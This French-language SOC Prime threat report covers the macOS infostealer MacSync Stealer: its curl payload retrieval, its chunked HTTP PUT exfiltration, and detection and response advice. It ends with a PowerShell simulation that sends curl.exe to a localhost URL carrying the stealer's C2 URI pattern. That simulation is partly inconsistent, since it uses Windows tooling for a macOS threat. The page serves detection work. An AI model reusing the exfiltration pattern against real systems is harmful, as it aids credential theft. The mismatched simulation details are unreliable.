SOC Prime Bias: High

20 Aug 2026 07:15 UTC

Suivi de l’infrastructure MacSync Stealer avec l’analyse comportementale

Author Photo
SOC Prime Team linkedin icon Suivre
Suivi de l’infrastructure MacSync Stealer avec l’analyse comportementale
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

MacSync Stealer est un voleur d’informations axé sur macOS qui repose sur une infrastructure de commande et de contrôle à rotation rapide. Le malware cible des données précieuses, notamment le contenu de la Trousseau macOS, les identifiants de navigateur, les clés SSH et les identifiants de cloud. Sa chaîne d’attaque pilotée par script combine l’ingénierie sociale, la récupération de charge utile via curl, et l’exfiltration de données par morceaux utilisant des requêtes HTTP PUT.

Enquête

Les experts Microsoft Defender ont identifié la menace en corrélant des comportements récurrents d’endpoint et de réseau au lieu de se fier à des indicateurs de domaine statiques. L’enquête a connecté plus de 30 domaines en se concentrant sur des pivots comportementaux durables tels que des chemins URI spécifiques, des chaînes User-Agent macOS, et des paramètres de téléchargement distinctifs. Cette approche a permis aux chercheurs de retracer l’activité depuis la récupération initiale de la charge utile jusqu’à la mise en scène des données et l’exfiltration finale.

Atténuation

Les organisations devraient réduire le risque d’exécution de Terminal initiée par l’utilisateur grâce à la sensibilisation à la sécurité et aux contrôles de plateforme qui limitent les workflows suspects de copier-coller. Protéger les réserves d’identifiants telles que le Trousseau macOS et les profils de navigateur contre l’accès non autorisé est crucial. Surveiller les combinaisons suspectes d’utilitaires macOS et de téléchargements HTTP PUT inhabituels peut également aider à détecter l’exfiltration active de données.

Réponse

Si une activité de MacSync Stealer est détectée, les intervenants devraient corréler l’exécution suspecte de shell et AppleScript avec la télémétrie réseau sortante. Les enquêteurs devraient examiner la création d’archives dans des emplacements temporaires tels que /tmp/ et identifier l’accès non autorisé aux fichiers sensibles. L’activité réseau devrait également être examinée pour les curl requêtes contenant des identifiants de téléchargement tels que upload_id, chunk_index, et total_chunks.

Flux d’attaque

Nous mettons encore à jour cette partie.

Détections

Tentative d’exécution suspecte de Curl [MacOS] (via cmdline)

Équipe SOC Prime
19 août 2026

Une archive a été créée dans le dossier temporaire de MacOS (via file_event)

Équipe SOC Prime
19 août 2026

Détection des modèles C2 et d’exfiltration de données de MacSync Stealer [Serveur Web]

Règles AI SOC Prime
19 août 2026

Détecter la récupération initiale de la charge utile MacSync Stealer et l’exécution d’AppleScript [Création de processus Linux]

Règles AI SOC Prime
19 août 2026

Exécution de simulation

Condition préalable : le contrôle préliminaire de la télémétrie et de la base de référence doit être passé.

Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTPs identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Les exemples abstraits ou non liés entraîneront un mauvais diagnostic.

  • Narration et commandes de l’attaque : Un adversaire a réussi à déployer le MacSync Stealer sur un serveur web cible. Ayant récolté des identifiants et des informations système sensibles, l’attaquant cherche maintenant à exfiltrer ces données vers son serveur de commande et de contrôle (C2). Pour se fondre dans le trafic administratif standard et éviter la détection par des outils simples basés sur la signature, l’attaquant utilise curl.exe pour envoyer les données volées. Ils ajoutent les paramètres URI malveillants spécifiques /dynamic?txd= à la requête, qui est la signature connue de l’infrastructure C2 de MacSync.

  • Script de test de régression :

    # Script de simulation pour déclencher la règle de détection C2 de MacSync Stealer
    # Cette commande utilise curl pour atteindre un point final C2 simulé avec le motif URI malveillant.
    
    $target_url = "http://127.0.0.1/dynamic?txd=malicious_payload_data"
    Write-Host "Simulation de communication MacSync Stealer C2..."
    curl.exe $target_url
  • Commandes de nettoyage :

    # Aucun fichier persistant n'est créé par cette simulation ; 
    # cependant, effacez l'historique local si nécessaire.
    Clear-History